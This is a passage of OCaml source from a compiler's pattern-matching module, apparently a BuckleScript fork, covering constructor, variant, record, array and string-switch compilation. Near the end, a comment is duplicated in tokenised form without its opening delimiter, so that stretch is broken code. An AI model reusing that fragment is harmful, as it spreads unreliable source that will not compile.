    ctx m
(* Matching against a constructor *)
(* Field accessors for positions [first_pos..last_pos] of block [arg],
   prepended to [argl]; empty when last_pos < first_pos. *)
let make_field_args ~fld_info loc binding_kind arg first_pos last_pos argl =
  let rec make_args pos =
    if pos > last_pos
    then argl
    else (Lprim(Pfield (pos, fld_info), [arg], loc), binding_kind) :: make_args (pos + 1)
  in make_args first_pos

(* Constructor patterns are keyed by their runtime tag. *)
let get_key_constr = function
  | {pat_desc=Tpat_construct (_, cstr,_)} -> cstr.cstr_tag
  | _ -> assert false

let get_args_constr p rem = match p with
| {pat_desc=Tpat_construct (_, _, args)} -> args @ rem
| _ -> assert false
(* NB: matcher_constr applies to default matrices.

   In that context, matching by constructors of extensible
   types degrades to arity checking, due to potential rebinding.
   This comparison is performed by Types.may_equal_constr.
*)
(* Default-matrix matcher specialized by constructor arity.
   Arity 0: try both branches of an or-pattern. Arity 1: match both
   branches and, when both survive, rebuild an or-pattern on the
   argument patterns. Higher arities: or-patterns are delegated to the
   caller by raising OrPat. *)
let matcher_constr cstr = match cstr.cstr_arity with
| 0 ->
    let rec matcher_rec q rem = match q.pat_desc with
      | Tpat_or (p1,p2,_) ->
          begin
            try matcher_rec p1 rem
            with NoMatch -> matcher_rec p2 rem
          end
      | Tpat_construct (_, cstr',[])
        when Types.may_equal_constr cstr cstr' -> rem
      | Tpat_any -> rem
      | _ -> raise NoMatch in
    matcher_rec
| 1 ->
    let rec matcher_rec q rem = match q.pat_desc with
      | Tpat_or (p1,p2,_) ->
          let r1 = try Some (matcher_rec p1 rem) with NoMatch -> None
          and r2 = try Some (matcher_rec p2 rem) with NoMatch -> None in
          begin match r1,r2 with
          | None, None -> raise NoMatch
          | Some r1, None -> r1
          | None, Some r2 -> r2
          | Some (a1::_), Some (a2::_) ->
              (* both alternatives survive: join their argument
                 patterns with a synthetic or-pattern *)
              {a1 with
               pat_loc = Location.none ;
               pat_desc = Tpat_or (a1, a2, None)}::
              rem
          | _, _ -> assert false
          end
      | Tpat_construct (_, cstr', [arg])
        when Types.may_equal_constr cstr cstr' -> arg::rem
      | Tpat_any -> omega::rem
      | _ -> raise NoMatch in
    matcher_rec
| _ ->
    fun q rem -> match q.pat_desc with
      | Tpat_or (_,_,_) -> raise OrPat
      | Tpat_construct (_,cstr',args)
        when Types.may_equal_constr cstr cstr' -> args @ rem
      | Tpat_any -> Parmatch.omegas cstr.cstr_arity @ rem
      | _ -> raise NoMatch
(* BuckleScript-specific external primitives used for option-like
   constructor representations.
   NOTE(review): "primitve" in the first name is a typo, kept because
   the name is presumably referenced elsewhere in this module. *)
let is_not_none_bs_primitve : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#is_not_none" ~arity:1 ~alloc:false)

let val_from_option_bs_primitive : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#val_from_option" ~arity:1 ~alloc:true)

let val_from_unnest_option_bs_primitive : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#val_from_unnest_option" ~arity:1 ~alloc:true)
(* Sub-matching for one constructor: compute the argument accessors
   according to the constructor's representation (inlined record,
   BuckleScript option-like, ordinary block, unboxed, extension). *)
let make_constr_matching p def ctx = function
    [] -> fatal_error "Matching.make_constr_matching"
  | ((arg, _mut) :: argl) ->
      let cstr = pat_as_constr p in
      let newargs =
        if cstr.cstr_inlined <> None then
          (* inlined record: the argument is the block itself *)
          (arg, Alias) :: argl
        else match cstr.cstr_tag with
        | Cstr_block _ when
            !Config.bs_only &&
            Datarepr.constructor_has_optional_shape cstr
          ->
            (* option-like shape: unwrap the payload with the dedicated
               BuckleScript primitive *)
            begin
              let from_option =
                match p.pat_desc with
                | Tpat_construct(_, _,
                                 [ {
                                   pat_type ; pat_env
                                 } ])
                  when Typeopt.cannot_inhabit_none_like_value pat_type pat_env
                  -> val_from_unnest_option_bs_primitive
                | _ -> val_from_option_bs_primitive in
              (Lprim (from_option, [arg], p.pat_loc), Alias) :: argl
            end
        | Cstr_constant _
        | Cstr_block _ ->
            make_field_args p.pat_loc Alias arg 0 (cstr.cstr_arity - 1) argl
              ~fld_info:(if cstr.cstr_name = "::" then Fld_cons else Fld_variant)
        | Cstr_unboxed -> (arg, Alias) :: argl
        | Cstr_extension _ ->
            (* field 0 of an extension block holds the extension slot,
               so payload fields start at position 1 *)
            make_field_args p.pat_loc Alias arg 1 cstr.cstr_arity argl
              ~fld_info:Fld_extension
      in
      {pm=
         {cases = []; args = newargs;
          default = make_default (matcher_constr cstr) def} ;
       ctx = filter_ctx p ctx ;
       pat=normalize_pat p}

(* Divide a matching whose heads are constructors, one cell per tag. *)
let divide_constructor ctx pm =
  divide
    make_constr_matching
    Types.equal_tag get_key_constr get_args_constr
    ctx pm
(* Matching against a variant *)
(* Default-matrix matcher for a constant variant with label [lab]. *)
let rec matcher_variant_const lab p rem = match p.pat_desc with
| Tpat_or (p1, p2, _) ->
    begin
      try
        matcher_variant_const lab p1 rem
      with
      | NoMatch -> matcher_variant_const lab p2 rem
    end
| Tpat_variant (lab1,_,_) when lab1=lab -> rem
| Tpat_any -> rem
| _ -> raise NoMatch

(* Constant variant: no payload, so the argument is simply dropped. *)
let make_variant_matching_constant p lab def ctx = function
    [] -> fatal_error "Matching.make_variant_matching_constant"
  | (_ :: argl) ->
      let def = make_default (matcher_variant_const lab) def
      and ctx = filter_ctx p ctx in
      {pm={ cases = []; args = argl ; default=def} ;
       ctx=ctx ;
       pat = normalize_pat p}

(* Default-matrix matcher for a non-constant variant with label [lab];
   or-patterns are delegated to the caller via OrPat. *)
let matcher_variant_nonconst lab p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_variant (lab1,Some arg,_) when lab1=lab -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch

(* Non-constant variant: the payload is read from field 1 of the block. *)
let make_variant_matching_nonconst p lab def ctx = function
    [] -> fatal_error "Matching.make_variant_matching_nonconst"
  | ((arg, _mut) :: argl) ->
      let def = make_default (matcher_variant_nonconst lab) def
      and ctx = filter_ctx p ctx in
      {pm=
         {cases = []; args = (Lprim(Pfield (1, Fld_poly_var_content), [arg], p.pat_loc), Alias) :: argl;
          default=def} ;
       ctx=ctx ;
       pat = normalize_pat p}

(* Divide a variant matching by (label, tag) key, skipping rows whose
   label is statically absent from the row type. Note: (=) is locally
   rebound to compare keys with Types.equal_tag on the tag component. *)
let divide_variant row ctx {cases = cl; args = al; default=def} =
  let row = Btype.row_repr row in
  let rec divide = function
      ({pat_desc = Tpat_variant(lab, pato, _)} as p:: patl, action) :: rem ->
        let variants = divide rem in
        if try Btype.row_field_repr (List.assoc lab row.row_fields) = Rabsent
           with Not_found -> true
        then
          variants
        else begin
          let tag = Btype.hash_variant lab in
          let (=) ((a:string),(b:Types.constructor_tag)) (c,d) =
            a = c && Types.equal_tag b d
          in
          match pato with
            None ->
              add (make_variant_matching_constant p lab def ctx) variants
                (=) (lab,Cstr_constant tag) (patl, action) al
          | Some pat ->
              add (make_variant_matching_nonconst p lab def ctx) variants
                (=) (lab,Cstr_block tag) (pat :: patl, action) al
        end
    | _ -> []
  in
  divide cl
(* Three ``no-test'' cases *)
(* Matching against a variable *)
(* Variables carry no sub-patterns. *)
let get_args_var _ rem = rem

(* Drop the matched argument; every default row is kept unchanged. *)
let make_var_matching def = function
  | [] -> fatal_error "Matching.make_var_matching"
  | _::argl ->
      {cases=[] ;
       args = argl ;
       default= make_default get_args_var def}

let divide_var ctx pm =
  divide_line ctx_lshift make_var_matching get_args_var omega ctx pm
(* Matching and forcing a lazy value *)
(* Sub-pattern of a lazy pattern (wildcards yield omega). *)
let get_arg_lazy p rem = match p with
| {pat_desc = Tpat_any} -> omega :: rem
| {pat_desc = Tpat_lazy arg} -> arg :: rem
| _ -> assert false

(* Default-matrix matcher for lazy patterns; or-patterns are delegated
   to the caller via OrPat. *)
let matcher_lazy p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omega :: rem
| Tpat_lazy arg -> arg :: rem
| _ -> raise NoMatch
(* Inlining the tag tests before calling the primitive that works on
lazy blocks. This is also used in translcore.ml.
No other call than Obj.tag when the value has been forced before.
*)
(* Look up [modname].[field] in the initial environment, building the
   lambda that fetches it from the global module block. Wrapped in
   [lazy] so the environment lookup only happens if actually needed;
   failures are fatal errors, not exceptions for the caller. *)
let get_mod_field modname field =
  lazy (
    try
      let mod_ident = Ident.create_persistent modname in
      let env = Env.open_pers_signature modname Env.initial_safe_string in
      let p = try
        match Env.lookup_value (Longident.Lident field) env with
        | (Path.Pdot(_,_,i), _) -> i
        | _ -> fatal_error ("Primitive "^modname^"."^field^" not found.")
      with Not_found ->
        fatal_error ("Primitive "^modname^"."^field^" not found.")
      in
      Lprim(Pfield (p, Fld_module {name = field}),
            [Lprim(Pgetglobal mod_ident, [], Location.none)],
            Location.none)
    with Not_found -> fatal_error ("Module "^modname^" unavailable.")
  )

(* Lazily resolved accessor for CamlinternalLazy.force. *)
let code_force =
  get_mod_field "CamlinternalLazy" "force"
;;
(* inline_lazy_force inlines the beginning of the code of Lazy.force. When
   the value argument is tagged as:
   - forward, take field 0
   - lazy, call the primitive that forces (without testing again the tag)
   - anything else, return it

   Using Lswitch below relies on the fact that the GC does not shortcut
   Forward(val_out_of_heap).
*)
(* Apply the (lazily resolved) CamlinternalLazy.force to [arg]. *)
let inline_lazy_force arg loc =
  Lapply { ap_func = Lazy.force code_force; ap_inlined = Default_inline; ap_args = [arg]; ap_loc = loc}

(* Sub-matching for lazy patterns: the argument becomes the forced
   value, bound Strict so the forcing code is evaluated eagerly. *)
let make_lazy_matching def = function
    [] -> fatal_error "Matching.make_lazy_matching"
  | (arg,_mut) :: argl ->
      { cases = [];
        args =
          (inline_lazy_force arg Location.none, Strict) :: argl;
        default = make_default matcher_lazy def }

let divide_lazy p ctx pm =
  divide_line
    (filter_ctx p)
    make_lazy_matching
    get_arg_lazy
    p ctx pm
(* Matching against a tuple pattern *)
(* Component patterns of a tuple pattern; wildcards expand to [arity]
   omegas. *)
let get_args_tuple arity p rem = match p with
| {pat_desc = Tpat_any} -> omegas arity @ rem
| {pat_desc = Tpat_tuple args} ->
    args @ rem
| _ -> assert false

(* Default-matrix matcher for tuples of a given arity; or-patterns are
   delegated to the caller via OrPat. *)
let matcher_tuple arity p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omegas arity @ rem
| Tpat_tuple args when List.length args = arity -> args @ rem
| _ -> raise NoMatch

(* Sub-matching for a tuple: one Pfield accessor per component. *)
let make_tuple_matching loc arity def = function
    [] -> fatal_error "Matching.make_tuple_matching"
  | (arg, _mut) :: argl ->
      let rec make_args pos =
        if pos >= arity
        then argl
        else (Lprim(Pfield (pos, Fld_tuple), [arg], loc), Alias) :: make_args (pos + 1) in
      {cases = []; args = make_args 0 ;
       default=make_default (matcher_tuple arity) def}

let divide_tuple arity p ctx pm =
  divide_line
    (filter_ctx p)
    (make_tuple_matching p.pat_loc arity)
    (get_args_tuple arity) p ctx pm
(* Matching against a record pattern *)
let record_matching_line num_fields lbl_pat_list =
let patv = Array.make num_fields omega in
List.iter (fun (_, lbl, pat) -> patv.(lbl.lbl_pos) <- pat) lbl_pat_list;
Array.to_list patv
let get_args_record num_fields p rem = match p with
| {pat_desc=Tpat_any} ->
record_matching_line num_fields [] @ rem
| {pat_desc=Tpat_record (lbl_pat_list,_)} ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> assert false
let matcher_record num_fields p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ ->
record_matching_line num_fields [] @ rem
| Tpat_record ([], _) when num_fields = 0 -> rem
| Tpat_record ((_, lbl, _) :: _ as lbl_pat_list, _)
when Array.length lbl.lbl_all = num_fields ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> raise NoMatch
(* Build the empty specialized matrix whose arguments access every field
   of the record argument, with the access primitive chosen from the
   record representation (regular, inlined, unboxed, extension). *)
let make_record_matching loc all_labels def = function
    [] -> fatal_error "Matching.make_record_matching"
  | ((arg, _mut) :: argl) ->
      let rec make_args pos =
        if pos >= Array.length all_labels then argl else begin
          let lbl = all_labels.(pos) in
          let access =
            match lbl.lbl_repres with
            | Record_float_unused -> assert false
            | Record_regular | Record_optional_labels _ ->
                Lprim (Pfield (lbl.lbl_pos, !Lambda.fld_record lbl), [arg], loc)
            | Record_inlined _ ->
                Lprim (Pfield (lbl.lbl_pos, Fld_record_inline {name = lbl.lbl_name}), [arg], loc)
            | Record_unboxed _ -> arg
            | Record_extension ->
                (* +1 skips the extension slot stored in field 0 *)
                Lprim (Pfield (lbl.lbl_pos + 1, Fld_record_extension {name = lbl.lbl_name}), [arg], loc)
          in
          let str =
            (* Alias for immutable fields, StrictOpt for mutable ones *)
            match lbl.lbl_mut with
              Immutable -> Alias
            | Mutable -> StrictOpt in
          (access, str) :: make_args(pos + 1)
        end in
      let nfields = Array.length all_labels in
      let def= make_default (matcher_record nfields) def in
      {cases = []; args = make_args 0 ; default = def}
(* Specialize matrix [pm] for a record pattern with labels [all_labels]. *)
let divide_record all_labels p ctx pm =
  let get_args = get_args_record (Array.length all_labels) in
  divide_line
    (filter_ctx p)
    (make_record_matching p.pat_loc all_labels)
    get_args
    p ctx pm
(* Matching against an array pattern *)
(* Discriminating key of an array pattern: its length. *)
let get_key_array = function
| {pat_desc=Tpat_array patl} -> List.length patl
| _ -> assert false
(* Replace an array pattern by its element sub-patterns. *)
let get_args_array p rem = match p with
| {pat_desc=Tpat_array patl} -> patl@rem
| _ -> assert false
(* Default-matrix matcher for arrays of length [len]. *)
let matcher_array len p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_array args when List.length args=len -> args @ rem
| Tpat_any -> Parmatch.omegas len @ rem
| _ -> raise NoMatch
(* Build the empty specialized matrix whose arguments are the elements
   of the array argument, read with Parrayrefu (unchecked access). *)
let make_array_matching p def ctx = function
  | [] -> fatal_error "Matching.make_array_matching"
  | ((arg, _mut) :: argl) ->
      let len = get_key_array p in
      let rec make_args pos =
        if pos >= len
        then argl
        else (Lprim(Parrayrefu ,
                    [arg; Lconst(Const_base(Const_int pos))],
                    p.pat_loc),
              StrictOpt) :: make_args (pos + 1) in
      let def = make_default (matcher_array len) def
      and ctx = filter_ctx p ctx in
      {pm={cases = []; args = make_args 0 ; default = def} ;
       ctx=ctx ;
       pat = normalize_pat p}
(* Group matrix rows by array-pattern length. *)
let divide_array ctx pm =
  divide
    make_array_matching
    (=) get_key_array get_args_array ctx pm
(*
   Specific string test sequence
   Will be called by the bytecode compiler, from bytegen.ml.
   The strategy is first dichotomic search (we perform 3-way tests
   with compare_string), then sequence of equality tests
   when there are less than T=strings_test_threshold static strings to match.

   Increasing T entails (slightly) less code, decreasing T
   (slightly) favors runtime speed.
   T=8 looks a decent tradeoff.
*)

(* Utilities *)
let strings_test_threshold = 8
(* External primitive: structural string inequality. *)
let prim_string_notequal =
  Pccall(Primitive.simple
           ~name:"caml_string_notequal"
           ~arity:2
           ~alloc:false)
(* External primitive: three-way string comparison. *)
let prim_string_compare =
  Pccall(Primitive.simple
           ~name:"caml_string_compare"
           ~arity:2
           ~alloc:false)
(* Bind [arg] to a fresh variable before building [k] over it, unless
   it already is a variable (avoids re-evaluating [arg] in each test). *)
let bind_sw arg k = match arg with
| Lvar _ -> k arg
| _ ->
    let id = Ident.create "switch" in
    Llet (Strict,Pgenval,id,arg,k (Lvar id))
(* Sequential equality tests *)
(* Compile a string match as a sequence of equality tests ending in the
   default [d]; when no default is given, the first case's action
   serves as the final fallback. *)
let make_string_test_sequence loc arg sw d =
  let d,sw = match d with
  | None ->
      begin match sw with
      | (_,d)::sw -> d,sw
      | [] -> assert false
      end
  | Some d -> d,sw in
  bind_sw arg
    (fun arg ->
      List.fold_right
        (fun (s,lam) k ->
          Lifthenelse
            (Lprim
               (prim_string_notequal,
                [arg; Lconst (Const_immstring s)], loc),
             k,lam))
        sw d)
(* Split [xs] around a pivot: stepping two-by-two through the first [k]
   positions selects the element just left of the middle, returned
   together with the elements before and after it.  [xs] must be
   non-empty. *)
let split k xs =
  let rec go n = function
    | [] -> assert false
    | y :: ys ->
        if n <= 1 then ([], y, ys)
        else
          let before, pivot, after = go (n - 2) ys in
          (y :: before, pivot, after)
  in
  go k xs
(* Constant 0, compared against the result of caml_string_compare. *)
let zero_lam = Lconst (Const_base (Const_int 0))

(* Three-way branch on the sign of [arg]:
   negative -> [lt], zero -> [eq], positive -> [gt]. *)
let tree_way_test loc arg lt eq gt =
  Lifthenelse
    (Lprim (Pintcomp Clt,[arg;zero_lam], loc),lt,
     Lifthenelse(Lprim (Pintcomp Clt,[zero_lam;arg], loc),gt,eq))
(* Dichotomic tree *)
(* Dichotomic search over a sorted string case list: below the
   threshold fall back to a linear test sequence, otherwise compare
   against the median string and recurse on both halves. *)
let rec do_make_string_test_tree loc arg sw delta d =
  let len = List.length sw in
  if len <= strings_test_threshold+delta then
    make_string_test_sequence loc arg sw d
  else
    let lt,(s,act),gt = split len sw in
    bind_sw
      (Lprim
         (prim_string_compare,
          [arg; Lconst (Const_immstring s)], loc))
      (fun r ->
        tree_way_test loc r
          (do_make_string_test_tree loc arg lt delta d)
          act
          (do_make_string_test_tree loc arg gt delta d))
(* Entry point *)
(* Entry point: compile a stringswitch.  When a default action exists,
   it is wrapped in a static catch so the tree can jump to it from
   several leaves without duplicating it. *)
let expand_stringswitch loc arg sw d = match d with
| None ->
    bind_sw arg
      (fun arg -> do_make_string_test_tree loc arg sw 0 None)
| Some e ->
    bind_sw arg
      (fun arg ->
        make_catch e
          (fun d -> do_make_string_test_tree loc arg sw 1 (Some d)))
(**********************)
(* Generic test trees *)
(**********************)

(* Sharing *)
(* Add handler, if shared *)
(* Returns (hs, handle_shared): [handle_shared] turns a possibly shared
   action into an exit to a fresh handler, while [hs] accumulates the
   corresponding catch-installing wrappers to apply around the result. *)
let handle_shared () =
  let hs = ref (fun x -> x) in
  let handle_shared act = match act with
  | Switch.Single act -> act
  | Switch.Shared act ->
      let i,h = make_catch_delayed act in
      let ohs = !hs in
      hs := (fun act -> h (ohs act)) ;
      make_exit i in
  hs,handle_shared
(* Share identical actions of a test tree through a store, rebuilding
   the case list and default over exits to shared handlers; returns the
   handler-installing wrapper, the rebuilt cases and the default. *)
let share_actions_tree sw d =
  let store = StoreExp.mk_store () in
  (* Default action is always shared *)
  let d =
    match d with
    | None -> None
    | Some d -> Some (store.Switch.act_store_shared d) in
  (* Store all other actions *)
  let sw =
    List.map (fun (cst,act) -> cst,store.Switch.act_store act) sw in
  (* Retrieve all actions, including potential default *)
  let acts = store.Switch.act_get_shared () in
  (* Array of actual actions *)
  let hs,handle_shared = handle_shared () in
  let acts = Array.map handle_shared acts in
  (* Reconstruct default and switch list *)
  let d = match d with
  | None -> None
  | Some d -> Some (acts.(d)) in
  let sw = List.map (fun (cst,j) -> cst,acts.(j)) sw in
  !hs,sw,d
(* Note: dichotomic search requires sorted input with no duplicates *)
(* Drop duplicate constants from an already sorted case list, keeping
   the first occurrence (so the first matching clause wins). *)
let rec uniq_lambda_list sw = match sw with
  | []|[_] -> sw
  | (c1,_ as p1)::((c2,_)::sw2 as sw1) ->
      if const_compare c1 c2 = 0 then uniq_lambda_list (p1::sw2)
      else p1::uniq_lambda_list sw1
(* Sort a constant case list and remove duplicates; the stable sort
   keeps the first clause for each constant. *)
let sort_lambda_list l =
  let l =
    List.stable_sort (fun (x,_) (y,_) -> const_compare x y) l in
  uniq_lambda_list l
(* [cut n l] splits [l] into its first [n] elements and the rest.
   Raises [Invalid_argument] when [l] has fewer than [n] elements. *)
let cut n l =
  let rec take k rest =
    match k, rest with
    | 0, _ -> ([], rest)
    | _, [] -> raise (Invalid_argument "cut")
    | _, hd :: tl ->
        let front, back = take (k - 1) tl in
        (hd :: front, back)
  in
  take n l
(* Linear sequence of [tst] comparisons ending in [fail]. *)
let rec do_tests_fail loc fail tst arg = function
  | [] -> fail
  | (c, act)::rem ->
      Lifthenelse
        (Lprim (tst, [arg ; Lconst (Const_base c)], loc),
         do_tests_fail loc fail tst arg rem,
         act)
(* Linear sequence of [tst] comparisons with no failure action: the
   last case is taken unconditionally. *)
let rec do_tests_nofail loc tst arg = function
  | [] -> fatal_error "Matching.do_tests_nofail"
  | [_,act] -> act
  | (c,act)::rem ->
      Lifthenelse
        (Lprim (tst, [arg ; Lconst (Const_base c)], loc),
         do_tests_nofail loc tst arg rem,
         act)
(* Compile a match on constants as a tree of [lt_tst] comparisons whose
   leaves are short linear test sequences; identical actions are shared
   beforehand and re-installed by [hs]. *)
let make_test_sequence loc fail tst lt_tst arg const_lambda_list =
  let const_lambda_list = sort_lambda_list const_lambda_list in
  let hs,const_lambda_list,fail =
    share_actions_tree const_lambda_list fail in
  let rec make_test_sequence const_lambda_list =
    if List.length const_lambda_list >= 4 && lt_tst <> Pignore then
      split_sequence const_lambda_list
    else match fail with
    | None -> do_tests_nofail loc tst arg const_lambda_list
    | Some fail -> do_tests_fail loc fail tst arg const_lambda_list
  and split_sequence const_lambda_list =
    let list1, list2 =
      cut (List.length const_lambda_list / 2) const_lambda_list in
    Lifthenelse(Lprim(lt_tst,
                      [arg; Lconst(Const_base (fst(List.hd list2)))],
                      loc),
                make_test_sequence list1, make_test_sequence list2)
  in
  hs (make_test_sequence const_lambda_list)
(* Argument module for the generic switch compiler (Switch.Make):
   describes how to build integer tests, bindings, offsets, catches and
   switches as lambda terms. *)
module SArg = struct
  type primitive = Lambda.primitive

  let eqint = Pintcomp Ceq
  let neint = Pintcomp Cneq
  let leint = Pintcomp Cle
  let ltint = Pintcomp Clt
  let geint = Pintcomp Cge
  let gtint = Pintcomp Cgt

  type act = Lambda.lambda

  let make_prim p args = Lprim (p,args,Location.none)
  let make_offset arg n = match n with
  | 0 -> arg
  | _ -> Lprim (Poffsetint n,[arg],Location.none)

  (* Bind the scrutinee once unless it already is a variable. *)
  let bind arg body =
    let newvar,newarg = match arg with
    | Lvar v -> v,arg
    | _ ->
        let newvar = Ident.create "switcher" in
        newvar,Lvar newvar in
    bind Alias newvar arg (body newarg)
  let make_const i = Lconst (Const_base (Const_int i))
  let make_isout h arg = Lprim (Pisout, [h ; arg],Location.none)
  let make_isin h arg = Lprim (Pnot,[make_isout h arg],Location.none)
  let make_if cond ifso ifnot = Lifthenelse (cond, ifso, ifnot)
  (* cases.(i) indexes into acts; rebuild an explicit (const, action)
     list shifted by [offset] and emit a constants-only Lswitch. *)
  let make_switch loc arg cases acts ~offset sw_names =
    let l = ref [] in
    for i = Array.length cases-1 downto 0 do
      l := (offset + i,acts.(cases.(i))) :: !l
    done ;
    Lswitch(arg,
            {sw_numconsts = Array.length cases ; sw_consts = !l ;
             sw_numblocks = 0 ; sw_blocks = [] ;
             sw_failaction = None;
             sw_names}, loc)
  let make_catch = make_catch_delayed
  let make_exit = make_exit
end
(* Action sharing for Lswitch argument *)
(* Share identical actions among the cases of an Lswitch, turning
   repeated actions into exits to common handlers; [hs] installs the
   needed static catches around the rebuilt switch. *)
let share_actions_sw sw =
  (* Attempt sharing on all actions *)
  let store = StoreExp.mk_store () in
  let fail = match sw.sw_failaction with
  | None -> None
  | Some fail ->
      (* Fail is translated to exit, whatever happens *)
      Some (store.Switch.act_store_shared fail) in
  let consts =
    List.map
      (fun (i,e) -> i,store.Switch.act_store e)
      sw.sw_consts
  and blocks =
    List.map
      (fun (i,e) -> i,store.Switch.act_store e)
      sw.sw_blocks in
  let acts = store.Switch.act_get_shared () in
  let hs,handle_shared = handle_shared () in
  let acts = Array.map handle_shared acts in
  let fail = match fail with
  | None -> None
  | Some fail -> Some (acts.(fail)) in
  !hs,
  { sw with
    sw_consts = List.map (fun (i,j) -> i,acts.(j)) consts ;
    sw_blocks = List.map (fun (i,j) -> i,acts.(j)) blocks ;
    sw_failaction = fail; }
(* Reintroduce fail action in switch argument,
for the sake of avoiding carrying over huge switches *)
(* When a switch has no failaction, promote its most frequent simple
   exit action (if it occurs at least 3 times) to be the failaction and
   drop the corresponding cases, shrinking the switch. *)
let reintroduce_fail sw = match sw.sw_failaction with
| None ->
    let t = Hashtbl.create 17 in
    (* Count occurrences of each simple-exit action. *)
    let seen (_,l) = match as_simple_exit l with
    | Some i ->
        let old = try Hashtbl.find t i with Not_found -> 0 in
        Hashtbl.replace t i (old+1)
    | None -> () in
    List.iter seen sw.sw_consts ;
    List.iter seen sw.sw_blocks ;
    let i_max = ref (-1)
    and max = ref (-1) in
    Hashtbl.iter
      (fun i c ->
        if c > !max then begin
          i_max := i ;
          max := c
        end) t ;
    if !max >= 3 then
      let default = !i_max in
      let remove ls =
        Ext_list.filter ls
          (fun (_,lam) -> match as_simple_exit lam with
          | Some j -> j <> default
          | None -> true) in
      {sw with
       sw_consts = remove sw.sw_consts ;
       sw_blocks = remove sw.sw_blocks ;
       sw_failaction = Some (make_exit default)}
    else sw
| Some _ -> sw
(* Instantiate the generic switch compiler over lambda actions. *)
module Switcher = Switch.Make(SArg)
open Switch
(* [last def l] returns the first component of the final pair of [l],
   or [def] when [l] is empty. *)
let rec last def = function
  | [] -> def
  | (x, _) :: [] -> x
  | _ :: tl -> last def tl
(* Lowest and highest keys covered by the (sorted) case list [l];
   falls back to [low]/[high] when [l] is empty. *)
let get_edges low high l =
  match l with
  | [] -> (low, high)
  | (first, _) :: _ -> (first, last high l)
(* Turn a sorted (int * action) case list into the interval array
   expected by the switch compiler, in the presence of a failure
   action.  [fail] is stored first so it receives action index 0;
   every gap in [low..high] not covered by [l] maps to that index. *)
let as_interval_canfail fail low high l =
  let store = StoreExp.mk_store () in
  let do_store _tag act =
    let i = store.act_store act in
    (* Debug trace, kept for reference:
       eprintf "STORE [%s] %i %s\n" _tag i (string_of_lam act) ;
    *)
    i in
  (* Intervals while the current action is not the fail action. *)
  let rec nofail_rec cur_low cur_high cur_act = function
    | [] ->
        if cur_high = high then
          [cur_low,cur_high,cur_act]
        else
          [(cur_low,cur_high,cur_act) ; (cur_high+1,high, 0)]
    | ((i,act_i)::rem) as all ->
        let act_index = do_store "NO" act_i in
        if cur_high+1= i then
          if act_index=cur_act then
            nofail_rec cur_low i cur_act rem
          else if act_index=0 then
            (cur_low,i-1, cur_act)::fail_rec i i rem
          else
            (cur_low, i-1, cur_act)::nofail_rec i i act_index rem
        else if act_index = 0 then
          (cur_low, cur_high, cur_act)::
          fail_rec (cur_high+1) (cur_high+1) all
        else
          (cur_low, cur_high, cur_act)::
          (cur_high+1,i-1,0)::
          nofail_rec i i act_index rem
  (* Intervals while the current action is the fail action (index 0). *)
  and fail_rec cur_low cur_high = function
    | [] -> [(cur_low, cur_high, 0)]
    | (i,act_i)::rem ->
        let index = do_store "YES" act_i in
        if index=0 then fail_rec cur_low i rem
        else
          (cur_low,i-1,0)::
          nofail_rec i i index rem in
  let init_rec = function
    | [] -> [low,high,0]
    | (i,act_i)::rem ->
        let index = do_store "INIT" act_i in
        if index=0 then
          fail_rec low i rem
        else
          if low < i then
            (low,i-1,0)::nofail_rec i i index rem
          else
            nofail_rec i i index rem in
  ignore (do_store "FAIL" fail) ; (* fail has action index 0 *)
  let r = init_rec l in
  Array.of_list r, store
(* Build the interval array when matching cannot fail.  When the case
   list has holes, the first action is stored shared, since the emitted
   switch reuses action 0 for unreachable entries. *)
let as_interval_nofail l =
  let store = StoreExp.mk_store () in
  let rec some_hole = function
    | []|[_] -> false
    | (i,_)::((j,_)::_ as rem) ->
        j > i+1 || some_hole rem in
  let rec i_rec cur_low cur_high cur_act = function
    | [] ->
        [cur_low, cur_high, cur_act]
    | (i,act)::rem ->
        let act_index = store.act_store act in
        if act_index = cur_act then
          i_rec cur_low i cur_act rem
        else
          (cur_low, cur_high, cur_act)::
          i_rec i i act_index rem in
  let inters = match l with
  | (i,act)::rem ->
      let act_index =
        (* In case there is some hole and that a switch is emitted,
           action 0 will be used as the action of unreachable
           cases (cf. switch.ml, make_switch).
           Hence, this action will be shared *)
        if some_hole rem then
          store.act_store_shared act
        else
          store.act_store act in
      assert (act_index = 0) ;
      i_rec i i act_index rem
  | _ -> assert false in
  Array.of_list inters, store
(* Sort an (int * action) case list by ascending key. *)
let sort_int_lambda_list l =
  let by_key (k1, _) (k2, _) =
    if k1 < k2 then -1
    else if k1 > k2 then 1
    else 0
  in
  List.sort by_key l
(* Sort the cases and convert them to interval form, together with the
   overall (low, high) edges of the tested range. *)
let as_interval fail low high l =
  let l = sort_int_lambda_list l in
  get_edges low high l,
  (match fail with
  | None -> as_interval_nofail l
  | Some act -> as_interval_canfail act low high l)
(* Compile an integer switch through the generic Switcher. *)
let call_switcher loc fail arg low high int_lambda_list sw_names =
  let edges, (cases, actions) =
    as_interval fail low high int_lambda_list in
  Switcher.zyva loc edges arg cases actions sw_names
(* Fold a non-empty pattern list into a single or-pattern. *)
let rec list_as_pat = function
  | [] -> fatal_error "Matching.list_as_pat"
  | [pat] -> pat
  | pat::rem ->
      {pat with pat_desc = Tpat_or (pat,list_as_pat rem,None)}
(* Patterns for the constructors of the type of [pats] that are not
   already matched by [pats]. *)
let complete_pats_constrs = function
| p::_ as pats ->
    List.map
      (pat_of_constr p)
      (complete_constrs p (List.map get_key_constr pats))
| _ -> assert false
Following two ` ` failaction '' function compute n , the trap handler
to jump to in case of failure of elementary tests
Following two ``failaction'' function compute n, the trap handler
to jump to in case of failure of elementary tests
*)
(* Failure action in "negative" style: a jump to the innermost default
   matrix handler, or no action at all when the match is total. *)
let mk_failaction_neg partial ctx def = match partial with
| Partial ->
    begin match def with
    | (_,idef)::_ ->
